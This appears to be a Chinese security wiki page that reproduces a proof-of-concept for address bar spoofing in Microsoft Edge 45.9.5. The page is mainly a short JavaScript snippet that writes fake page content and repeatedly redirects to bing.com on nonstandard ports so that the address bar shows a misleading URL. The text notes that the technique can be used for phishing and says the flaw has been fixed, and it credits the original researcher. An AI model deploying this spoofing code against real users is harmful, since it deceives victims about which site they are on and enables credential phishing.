menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right --Vulnerability-main chevron_right Microsoft Edge浏览器 45.9.5地址栏欺骗POC.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    Microsoft Edge浏览器 45.9.5地址栏欺骗POC.md
    418 B / 2021-05-21 09:14:38
        # Microsoft Edge浏览器 45.9.5地址栏欺骗POC
    
    可以用来钓鱼...不过目前已经被修复了。
    
    
    ```js
    <script>
    document.write("<h1>This is not Bing</h1>");
    location.href = "https://bing.com:8081";
    setInterval(function(){location.href="https://bing.com:8080";},7000);
    </script>
    ```
    
    PoC视频:https://video.twimg.com/ext_tw_video/1357095235218735105/pu/vid/720x1426/eRpfwsqsvDGapGry.mp4
    
    via@rafaybaloch
    
    
    links
    file_download